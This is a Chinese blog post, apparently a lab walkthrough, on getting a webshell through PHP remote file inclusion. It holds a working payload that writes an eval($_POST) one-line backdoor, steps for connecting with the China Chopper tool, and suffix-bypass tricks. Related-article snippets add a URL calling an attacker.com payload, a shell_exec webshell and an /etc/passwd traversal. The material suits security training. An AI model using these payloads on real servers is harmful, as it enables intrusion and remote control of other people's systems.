远程文件包含shell

最新推荐文章于 2023-05-07 16:02:25 发布
最新推荐文章于 2023-05-07 16:02:25 发布
阅读量3.3k 收藏 2
点赞数
分类专栏: 网络安全

预备知识

程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无须再次编写,这种调用文件的过程称为包含。

实验目的

远程文件包含shell

实验工具

火狐浏览器菜刀软件工具

实验环境

客户机一台(操作系统为Windows Server 2003)服务器一台(操作系统为Windows Server 2003)

实验步骤

1、访问127.0.0.1/FI/PHP_FI.php?filename=RFI.txt,网页显示是远程文件包含漏洞。

2、访问网址127.0.0.1/yi.txt,可以看到可以访问的木马。

3.访问127.0.0.1/FI/PHP_FI.php?filename=http://127.0.0.1/yi.txt会在当前目录生成一句话木马a.php

3、打开桌面的【实验工具】文件夹,双击打开【中国菜刀】文件夹,找到【中国菜刀.exe】,双击打开。

利用远程文件漏洞用菜刀连接,空白处右击选择【添加】。

地址处填写http://127.0.0.1/FI/a.php。添加完毕,双击新添加的记录进行运行

 

 

1.本机上2.php的代码如下

<?php
     $sj=$_GET['sj'];
     include($sj);
?>

假如我们不能上传文件,又想拿到shell,我们ke'y可以先写一个muma.txt,内容如下:

<?php
$a = "<?php eval(\$_POST['123'])?>";
$b = fopen("a.php","w") or die("123!");
fwrite($b,$a);
fclose($b);
?>

访问http://ip1/2.php?sj=http://ip2/muma.txt

上菜刀

2(绕过方式).本机上2.php的代码如下

<?php
     $sj=$_GET['sj'];
     include($sj.".html");
?>

muma.txt如上

访问http://ip1/2.php?sj=http://ip2/muma.txt?

上菜刀

绕过方式分为(1.?绕过  2.#绕过%23)

 

 

 

 

通天云计算
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
实验38:远程文件包含漏洞案例讲解和演示
qq_44720671的博客
05-12 690
远程文件包含漏洞案例讲解和演示 可以通过php协议实现远程文件包含,这个include默认是关闭的,我们可以手动给他打开 远程包含漏洞危害级别要高出本地的很多,因为本地的利用是有限的,我们还需要去猜这个配置文件的漏洞,危害自然就低一些 比如我们可以在远端写一个一句话木马,放到本地去执行,实现了目标站点的远程控制 我们以pikachu为例,打开此页面 我们发现 在测试站点中,直接写了一个fop...
ThinkCMF 任意内容包含getshell漏洞
最新发布
10-26
ThinkCMF 任意内容包含getshell漏洞
文件包含渗透File inclusion 本地文件和远程文件包含+webshell(网络安全学习11)
Until_U的博客
07-04 3777
CONTENTS 1 文件包含渗透简述 1.1 原理和危害 1.2 实验模拟环境 2 低安全级别渗透 2.1 本地文件包含 2.2 本地文件包含+webshell 2.3 远程文件包含+webshell 3 中安全级别渗透 3.1 本地文件包含 3.2 本地文件包含+webshell 3.3 远程文件包含+webshell 4 高安全级别渗透 1 文件包含渗透简述 1.1 原理和危害 文件包含漏洞:即File Inclusion,意思是文件包含(漏洞),是指当服务器开启a.
shell手册关于cgi编程
11-10
简要介绍关于shell的一些基本知识,以及cgi脚本编程
文件包含漏洞02】文件包含漏洞原理及本地远程两种攻击方式
Fighting_hawk的博客
03-10 4888
1. 理解文件包含漏洞产生的原因; 2. 掌握本地与远程利用漏洞的方式。
文件包含漏洞利用之本地包含配合文件上传包含图片马&&文件包含漏洞利用之远程包含Webshell
m0_73720136的博客
05-07 3240
通过本实验,掌握文件上传+文件包含的组合漏洞,在绕过上传的检测时可以制作图片马上传,图片马上传成功不能直接解析,可以利用文件包含的特点进行解析图片马。通过本实验,掌握在无其他漏洞,只有文件包含漏洞,且目标服务器本地无shell文件可利用,又可以远程文件包含时,可以在攻击机本地新建一个一句话木马文件(比如:shell.txt,不要以.php的文件存在,因为php文件在操作机本地会被解析),然后远程包含攻击机本地新建的木马文件,从而Getshell
文件包含漏洞-02】文件包含漏洞原理、简单测试实例以及空字符绕过实例
m0_64378913的博客
06-15 3015
概述:文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。定义:随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的
使用SMB共享来绕过php远程文件包含的限制执行RFI的利用
10-16
3. 攻击者找到一个具有远程文件包含漏洞的PHP应用程序,尝试让其加载SMB共享中的Web shell。 4. 当易受攻击的PHP代码尝试包含SMB URL时,由于SMB共享的匿名访问权限,PHP代码将成功加载并执行Web shell。 为了演示...
VBScript 打造自己的远程CMDShell附使用教程
09-05
这里的`enun.vbs`是我们的核心脚本,它包含了与远程服务器建立连接和执行命令的逻辑。 **步骤四:身份验证和命令执行** 脚本中的密码验证是基于字符串“enun”的,当远程机器发送这个字符串并被服务器接收后,才会...
远程shell调用.rar
12-16
这个“远程shell调用.rar”文件包含了一个基于Java的工具,它允许开发者通过SSH连接到Linux服务器并执行Shell脚本,从而简化了这一过程。 首先,让我们了解一下SSH2。SSH2是SSH协议的第二版,相比SSH1,它提供了更...
Shell中使用scp命令实现文件上传代码
09-15
在Linux或Unix系统中,`scp`(Secure Copy)命令是一种用于安全地在本地主机和远程主机之间传输文件的工具,它基于SSH(Secure Shell)协议。在Shell脚本中使用scp命令可以自动化文件上传过程,提高效率,减少错误。...
Linux中的Shell用SSH自动登录远程服务器后执行命令并自动退出
qq_27286399的博客
09-21 6635
目录 [隐藏] 1 SSH命令格式 2 主要参数说明 3 ssh控制远程主机,远程执行命令步骤 4 准备工作 5 基于公私钥认证远程登录可能存在的不足 6 ssh 执行远程命令格式 6.1 打开远程shell 7 ssh的-t参数 SSH命令格式 usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port] [-e esca
springboot jar linux后台启动
小石头记
03-05 201
更多内容请浏览本人博客 springboot打成jar包后,可直接用java -jar app.jar 启动,或者使用 nohup java -jar app.jar & 后台启动,也可以将 jar包链接到/etc/init.d/下,作为服务启动 ,这两种启动方式各有缺点,可以用一个shell脚本解决这个问题 将文章最后脚本保存为sh文件,比如 spring-boot.sh ,跟jar包放...
WEB页面执行shell命令
Jun626的博客
01-12 2277
无法执行复杂的脚本命令,如带有" |等特殊符号的命令无法执行,如yum、top命令执行结果不完整、仅适用于简单带输出脚本命令,脚本运行账号为apache。限制用户访问cgi-bin目录,修改/etc/httpd/conf/httpd.conf。5.cgi-bin目录执行shell脚本格式。配置http页面账号密码访问,也可实现安全性。上面是我的微信和QQ群,欢迎新朋友的加入。注意修改代码中ip,更改为服务器ip或域名。记得给执行权限,chmod a+x *需要配置一下apache2。测试:在浏览器中输入。
通过CGI实现在Web页面上执行shell命令
热门推荐
ipqtjmqj的博客
06-02 1万+
今天无意中发现,URL中的查询字符串,不一定非要是xxx=yyy&aaa=bbb格式,服务器将URL中问号后的查询字符串赋给名为QUERY_STRING的环境变量,然后调用可执行的脚本或二进制文件执行,将其标准输出返回给客户端。 所以我想可以直接把shell命令作为URL输入,返回shell执行的输出。试了下,果然可以。
CGI漏洞速查一
|独自望海。。。
09-28 1346
1.wguset.exe   描述: 如果您使用NT做为您的WebServer的操作系统,而且 “wguest.exe”存在于您的Web可执行目录中的话,入侵者将能利用 它阅读到您的硬盘上所有USR_用户能阅读的文件。 建议: 将wguset.exe从你的We
Web漏洞检测及修复
秋天穿秋裤的Blog
07-16 2258
挺全的,建站时候应该一一检测,做安全审查~
文件包含漏洞】
qq_55213436的博客
03-27 4419
一、前言 把可重复使用函数写入到单个文件中,在使用该函数,直接调用此文件,无需编写函数,这一调用文件的过程被称为包含。文件包含漏洞是一种常见的web类型漏洞,因为很多脚本语言支持使用文件包含,也就是我们所说的文件包含函数,网站开发者经常会把一些代码插入到指定的地方,从而节省之间避免再次编写 ,这就是包含函数的基础解释 ,但是我们不光可以包含我们预先指定的文件,也可以包含我们服务器内部的其他文件,前提条件就是我们需要有可读的权限才能读取这些文件 ,所以这样就会导致文件包含漏洞。 二、文件包含...
服务器端文件包含,btslab全攻略——注入之远程文件包含&服务器端包含
05-22
远程文件包含(Remote File Inclusion,RFI)和服务器端文件包含(Server Side Include,SSI)是常见的Web应用程序漏洞,攻击者通过利用这些漏洞可以获取网站服务器上的敏感信息,甚至控制整个服务器。下面我来介绍一下这两种漏洞。 一、远程文件包含 远程文件包含是指攻击者通过Web应用程序加载远程托管的文件,这些文件可能包含恶意代码,攻击者可以利用这些代码执行各种攻击,例如窃取敏感信息、控制服务器等。 攻击者通常会在URL中注入恶意代码,例如: ``` http://www.example.com/index.php?page=http://www.attacker.com/evil.txt ``` 这个URL中的参数page就是攻击者注入的恶意代码,如果应用程序没有对该参数进行过滤,就会直接加载远程的evil.txt文件,并执行其中的代码。攻击者可以在evil.txt中写入任意的PHP代码,例如: ``` <?php echo shell_exec($_GET['cmd']); ?> ``` 这段代码会执行用户传入的cmd参数,并将结果输出,攻击者可以通过以下URL执行任意的系统命令: ``` http://www.example.com/index.php?page=http://www.attacker.com/evil.txt&cmd=ls%20-la ``` 二、服务器端文件包含 服务器端文件包含是指Web应用程序在处理动态内容时,将用户输入作为文件名或路径名进行处理,攻击者可以利用这个漏洞访问其他文件中的代码,例如配置文件、用户数据等。 攻击者通常会在URL中注入恶意代码,例如: ``` http://www.example.com/index.php?page=../../../etc/passwd ``` 这个URL中的参数page就是攻击者注入的恶意代码,如果应用程序没有对该参数进行过滤,就会直接加载/etc/passwd文件,并将其中的内容输出到页面上,攻击者可以通过这种方式获取敏感信息。 总结 要防止远程文件包含和服务器端文件包含漏洞,应该对所有用户输入进行过滤和验证,避免用户输入作为文件名或路径名进行处理。应用程序应该使用白名单机制,仅允许访问特定目录下的文件,而不是允许任意文件的访问。此外,应用程序应该启用PHP的安全模式,禁止执行外部命令、禁止访问网络等操作,以提高安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值